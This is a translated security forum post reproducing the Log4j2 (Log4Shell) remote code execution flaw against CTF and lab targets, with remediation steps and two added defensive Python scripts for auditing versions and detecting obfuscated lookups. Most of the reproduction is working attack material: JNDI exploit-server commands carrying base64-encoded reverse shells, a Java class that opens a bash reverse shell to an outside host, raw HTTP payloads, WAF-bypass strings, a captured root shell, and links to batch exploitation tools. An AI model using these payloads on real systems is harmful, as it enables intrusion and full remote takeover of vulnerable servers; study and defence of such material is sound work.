Reproducing the Apache Log4j2 Arbitrary Code Execution Vulnerability

atkx   ·   Posted 2022-03-12 18:43:33   ·   Vulnerability Articles

0x00 Vulnerability Overview

Summary

Apache Log4j2 is a widely used Java logging framework. On 24 November 2021 the Alibaba Cloud security team reported a remote code execution vulnerability in Apache Log4j2 to Apache. Because certain Log4j2 features resolve lookups recursively, an attacker can trigger remote code execution simply by crafting a malicious request. Exploitation requires no special configuration; the Alibaba Cloud security team verified that Apache Struts2, Apache Solr, Apache Druid, Apache Flink and others are all affected.

How it works

When Log4j2 formats a log message it runs a lookup function: if the logged data contains a string of the form ${xxxx}, Log4j treats it as a resource address and requests it. If that string is the address of an LDAP service, a JNDI injection can occur and lead to RCE, which is why this vulnerability is also described as a JNDI injection vulnerability.

0x01 Affected Versions

Versions: Apache Log4j 2.x < 2.15.0-rc2

The vulnerable Log4j affects more than 6000 middleware components or applications. Known potentially affected applications and components include, but are not limited to, the following:

  • Spring-Boot-starter-log4j2
  • Apache Struts2
  • Apache Solr
  • Apache Flink
  • Apache Druid
  • ElasticSearch
  • Flume
  • Dubbo
  • Redis
  • Logstash
  • Kafka

0x02 Remediation

1) Upgrade log4j2 to the latest release, log4j-2.15.0. The official fix defends by:

  • only loading LDAP resource files that are explicitly allowed
  • only loading fixed LDAP resource addresses

2) Change the configuration. Add the following to the project's log4j2.component.properties file (note that this method only applies to log4j-2.10.0 and later):

    log4j2.formatMsgNoLookups = true

The same setting can also be passed as a JVM startup option:

    -Dlog4j2.formatMsgNoLookups=true

3) Deploy software or hardware WAFs.
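As an added example (not part of the original post), the following Python script turns the remediation points above into a quick audit of one deployment: it parses a Log4j version string against the affected range stated above (2.x < 2.15.0-rc2), checks whether a JVM command line or a log4j2.component.properties file sets log4j2.formatMsgNoLookups=true, and applies the caveat that the property is only honoured from 2.10.0 onwards. The version strings, command lines and properties text in the sample are constructed, and the helper names are my own.

```python
import re

# Affected range as stated in the post: Log4j 2.x < 2.15.0-rc2.
FIXED_VERSION_STR = "2.15.0-rc2"
# The formatMsgNoLookups property is only honoured by 2.10.0 and later (also per the post).
PROPERTY_MIN_VERSION_STR = "2.10.0"


def parse_version(version: str):
    """Turn '2.14.1' or '2.15.0-rc2' into a comparable tuple.
    A final release (no rc suffix) ranks above all of its release candidates."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-rc(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch, rc = m.groups()
    rc_rank = float("inf") if rc is None else int(rc)  # final release sorts after any rc
    return (int(major), int(minor), int(patch), rc_rank)


def is_affected_version(version: str) -> bool:
    """True for any 2.x release below 2.15.0-rc2."""
    v = parse_version(version)
    return v[0] == 2 and v < parse_version(FIXED_VERSION_STR)


def property_is_honoured(version: str) -> bool:
    """formatMsgNoLookups does nothing on releases older than 2.10.0."""
    return parse_version(version) >= parse_version(PROPERTY_MIN_VERSION_STR)


def jvm_flag_set(cmdline: str) -> bool:
    """True if the Java command line carries -Dlog4j2.formatMsgNoLookups=true."""
    return re.search(r"-Dlog4j2\.formatMsgNoLookups=true\b", cmdline) is not None


def properties_flag_set(properties_text: str) -> bool:
    """True if log4j2.component.properties sets log4j2.formatMsgNoLookups=true.
    Comment lines (# or !) are ignored; key and value may be separated by '=', ':' or whitespace."""
    for line in properties_text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        m = re.fullmatch(r"log4j2\.formatMsgNoLookups\s*[=:\s]\s*(\S+)", line)
        if m:
            return m.group(1).lower() == "true"
    return False


def assess(version: str, cmdline: str = "", properties_text: str = "") -> str:
    """Classify one deployment as 'patched', 'mitigated' or 'exposed'."""
    if not is_affected_version(version):
        return "patched"
    flag_present = jvm_flag_set(cmdline) or properties_flag_set(properties_text)
    if flag_present and property_is_honoured(version):
        return "mitigated"
    return "exposed"


if __name__ == "__main__":
    # Constructed sample deployments (version, JVM command line, properties file contents).
    samples = [
        ("2.14.1", "java -jar app.jar", ""),
        ("2.14.1", "java -Dlog4j2.formatMsgNoLookups=true -jar app.jar", ""),
        ("2.9.1", "java -Dlog4j2.formatMsgNoLookups=true -jar app.jar", ""),  # flag ignored on 2.9.x
        ("2.15.0-rc1", "", "# site config\nlog4j2.formatMsgNoLookups = true\n"),
        ("2.15.0", "", ""),
    ]
    for version, cmdline, props in samples:
        print(f"{version:12} -> {assess(version, cmdline, props)}")
```

The point of the 2.9.1 row is the caveat from the post: a deployment can carry the correct flag and still be exposed because the running version predates the property, so an audit has to check both the version and the setting together.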

0x03 Reproduction

Reproduction requires a Java environment:

    apt-get update
    apt install default-jre
    apt install openjdk-8-jdk
    apt install openjdk-8-jre-headless

Approach 1

Vulfocus log4j2-rce target
Environment from https://www.ctfer.vip/

Capture the request (screenshot)

Then start the JNDI server and an nc listener on the VPS; the security group must open ports 1099, 1389 and 8180:

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "1.2.3.4"

Listen:

    nc -lnvp 6666

POST the payload:

    /hello
    payload=${jndi:rmi://ip:1099/e6hn8w}

Reproduction successful (screenshot)

Reproduction walkthrough

    root@atkx:/var/www/ctf# ls
    JNDIExploit-1.2-SNAPSHOT.jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar marshalsec-0.0.3-SNAPSHOT-all.jar test1
    root@atkx:/var/www/ctf# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTkuMTIyLjI1NC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "vps"
    [ADDRESS] >> vps
    [COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTkuMTIyLjI1NC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}
    ----------------------------JNDI Links----------------------------
    Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
    rmi://vps:1099/46zkaz
    ldap://vps:1389/46zkaz
    Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
    rmi://vps:1099/e6hn8w
    Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
    rmi://vps:1099/tgf9tx
    ldap://vps:1389/tgf9tx
    ----------------------------Server Log----------------------------
    2021-12-15 18:55:08 [JETTYSERVER]>> Listening on 0.0.0.0:8180
    2021-12-15 18:55:08 [RMISERVER] >> Listening on 0.0.0.0:1099
    2021-12-15 18:55:08 [LDAPSERVER] >> Listening on 0.0.0.0:1389
    2021-12-15 18:55:48 [RMISERVER] >> Have connection from /1.14.71.254:35328
    2021-12-15 18:55:49 [RMISERVER] >> Reading message...
    2021-12-15 18:55:49 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
    2021-12-15 18:55:49 [RMISERVER] >> Sending local classloading reference.
    WARNING: An illegal reflective access operation has occurred
    WARNING: Illegal reflective access by util.Reflections (file:/var/www/ctf/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar) to field com.sun.jndi.rmi.registry.ReferenceWrapper.wrappee
    WARNING: Please consider reporting this to the maintainers of util.Reflections
    WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
    WARNING: All illegal access operations will be denied in a future release
    2021-12-15 18:55:49 [RMISERVER] >> Closing connection
    2021-12-15 18:55:50 [RMISERVER] >> Have connection from /1.14.71.254:35330
    2021-12-15 18:55:50 [RMISERVER] >> Reading message...
    2021-12-15 18:55:50 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
    2021-12-15 18:55:50 [RMISERVER] >> Sending local classloading reference.
    2021-12-15 18:55:50 [RMISERVER] >> Closing connection
    2021-12-15 18:55:50 [RMISERVER] >> Have connection from /1.14.71.254:35334
    2021-12-15 18:55:50 [RMISERVER] >> Reading message...
    2021-12-15 18:55:50 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
    2021-12-15 18:55:50 [RMISERVER] >> Sending local classloading reference.
    2021-12-15 18:55:50 [RMISERVER] >> Closing connection
    2021-12-15 18:55:51 [RMISERVER] >> Have connection from /1.14.71.254:35338
    2021-12-15 18:55:51 [RMISERVER] >> Reading message...
    2021-12-15 18:55:51 [RMISERVER] >> Is RMI.lookup call for e6hn8w 2
    2021-12-15 18:55:51 [RMISERVER] >> Sending local classloading reference.
    2021-12-15 18:55:51 [RMISERVER] >> Closing connection

Open another window and listen:

    root@atkx:~# nc -lnvp 6666
    Listening on [0.0.0.0] (family 0, port 6666)
    Connection from 1.14.71.254 47878 received!
    bash: cannot set terminal process group (1): Inappropriate ioctl for device
    bash: no job control in this shell
    root@c24ad0372627:/demo# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@c24ad0372627:/demo# whoami
    whoami
    root
    root@c24ad0372627:/demo# env
    env
    HOSTNAME=c24ad0372627
    PWD=/demo
    HOME=/root
    LS_COLORS=
    FLAG=NSSCTF{1a105ee4-cb02-4a07-99ef-3645c451eb6a}
    SHLVL=2
    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    _=/usr/bin/env
    root@c24ad0372627:/demo#

Payload

    POST /hello HTTP/1.1
    Host: 1.14.71.254:28035
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48
    Origin: http://1.14.71.254:28035
    Connection: close
    Referer: http://1.14.71.254:28035/hello
    Upgrade-Insecure-Requests: 1
    payload=${jndi:rmi://vps:1099/e6hn8w}

Approach 2

Zkaq (掌控安全) Log4j2 lab
Lab address: http://d63bb2586.lab.aqlab.cn/
Tool: https://github.com/RandomRobbieBF/marshalsec-jar

1. Build the deserialization payload class Exp.java; only the ip needs changing:

    import java.lang.Runtime;
    import java.lang.Process;

    public class Exp {
        static {
            try {
                Runtime rt = Runtime.getRuntime();
                String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/ip/6666 0>&1"};
                Process pc = rt.exec(commands);
                pc.waitFor();
            } catch (Exception e) {
                // do nothing
            }
        }
    }

2. Compile it with javac:

    javac Exp.java

3. Put the resulting class file into the web directory we are about to serve, then start the server:

    root@atkx:/var/www/ctf/test1# ls
    Exp.class Exp.java
    root@atkx:/var/www/ctf/test1# python -m SimpleHTTPServer 5555

or

    root@atkx:/var/www/ctf/test1# python3 -m http.server 5555

4. Browsing to it looks like this (screenshot).

5. Then run the following command:

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ip/#Exp" 5556

Ran into an error here:

    root@atkx:/var/www/ctf# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://vps:5555/#Exp" 5556

6. Start an nc listener on the port used in Exp.java above:

    nc -lnvp 6666

7. With the preparation done, send the payload:

    ${jndi:ldap://ip:5556/Exp}

Reproduction successful (screenshot)

Approach 3

Apache log4j vulnerable target; environment from https://www.ctfer.vip/
Tool: https://github.com/feihong-cs/JNDIExploit
The Log4j2 vulnerable environment can also be used for reproduction; download: https://github.com/fengxuangit/log4j_vuln

Docker commands to create the environment:

    docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
    docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
    docker exec -it log4j_vuln_container /bin/bash
    /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

Target (screenshot)

Run:

    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip

Then listen:

    nc -lnvp 6666

Then POST:

    /webstudy/hello-fengxuan
    c=${jndi:ldap://ip:1389/Basic/Command/Base64/Base编码}

Reverse shell obtained (screenshot)

Command execution bypass

    $ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip -l 1389 -p 5555
    [+] LDAP Server Start Listening on 1389...
    [+] HTTP Server Start Listening on 5555...

Send the payload:

    POST /hello HTTP/1.1
    Host: 1.14.71.254:28009
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 66
    Origin: http://1.14.71.254:28009
    Connection: close
    Referer: http://1.14.71.254:28009/hello
    Upgrade-Insecure-Requests: 1
    cmd: whoami
    payload=${jndi:ldap://vps:1389/TomcatByPass/TomcatEcho}

Reproduction successful (screenshot)

But this method doesn't seem able to pop a shell; not sure whether it's my problem....

log4shell-vulnerable-app target
Entry route /, the parameter is the X-Api-Version request header: https://github.com/christophetd/log4shell-vulnerable-app

Finally, a GUI tool; project page:
GitHub - inbug-team/Log4j_RCE_Tool: multi-threaded batch Log4j detection and exploitation tool

0x04 Bypass

Some bypass tricks:

    ${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}
    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://vps:1099/dj05um}
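The nested lookups in the two bypass payloads above defeat a naive search for the literal string ${jndi:. As an added example (not code from the original post or from any of the tools it references), the Python below normalises those forms before matching: it resolves ${::-x} default-value lookups and ${lower:...}/${upper:...} innermost-first, URL-decodes form-encoded bodies, and only then looks for ${jndi:scheme://host, so a detection rule sees the same text Log4j would have resolved. It is run over a few constructed request lines that reuse the payload shapes from this post; the function names and sample lines are my own.

```python
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further braces.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# What we ultimately want to see after normalisation.
JNDI_REF = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def _resolve_one(match: "re.Match") -> str:
    """Resolve a single innermost lookup to the text Log4j would substitute.
    Only the obfuscation forms used in the bypass payloads are handled; anything
    else (jndi:, env:, date:, ...) is returned unchanged so it stays visible."""
    body = match.group(1)
    if body.startswith("::-"):            # ${::-j}  -> empty key, default value 'j'
        return body[3:]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":   # ${lower:RMI} -> 'rmi'
        return arg.lower()
    if sep and kind.lower() == "upper":   # ${upper:rmi} -> 'RMI'
        return arg.upper()
    return match.group(0)


def resolve_lookups(text: str, max_rounds: int = 10) -> str:
    """Repeatedly collapse innermost lookups until the string stops changing.
    max_rounds bounds the work done on hostile, deeply nested input."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_one, text)
        if resolved == text:
            return resolved
        text = resolved
    return text


def inspect_request(line: str) -> dict:
    """Decode and normalise one request line, then report any JNDI reference found."""
    resolved = resolve_lookups(unquote(line))
    m = JNDI_REF.search(resolved)
    return {
        "raw": line,
        "resolved": resolved,
        "jndi": m is not None,
        "scheme": m.group(1).lower() if m else None,
        "host": m.group(2) if m else None,
    }


def scan(lines) -> list:
    """Return the inspection records for every line carrying a JNDI lookup."""
    return [rec for rec in (inspect_request(line) for line in lines) if rec["jndi"]]


# Constructed sample request lines (not real traffic); the payload shapes mirror this post.
SAMPLE_REQUESTS = [
    "POST /hello payload=hello%20world",
    "POST /hello payload=${jndi:rmi://vps:1099/e6hn8w}",
    "POST /hello payload=${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}",
    "POST /hello payload=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://vps:1099/dj05um}",
    "GET / X-Api-Version: %24%7Bjndi%3Aldap%3A%2F%2Fvps%3A1389%2Fa%7D",
    "GET /search q=${date:yyyy}",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(f"{hit['scheme']:5} {hit['host']:20} <- {hit['raw']}")
```

Matching on the resolved form rather than the raw bytes is what makes the rule robust to the ${::-j} and ${lower:...} variants; the scheme and host fields are what an alert or a block rule would key on, and the benign ${date:yyyy} line shows that ordinary lookups are left alone rather than flagged.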

References:
https://mp.weixin.qq.com/s/lQhG7MOFurKsSP5yz1b3EA
https://gylq.gitee.io/posts/180.html
https://blog.csdn.net/weixin_42891146/article/details/121871851


没勇气先生
Posted 2022-3-31

No idea what this is, but it sounds impressive.


yangroupaomo
Posted 2022-4-6

666


© 2016 - 2024 掌控者 All Rights Reserved.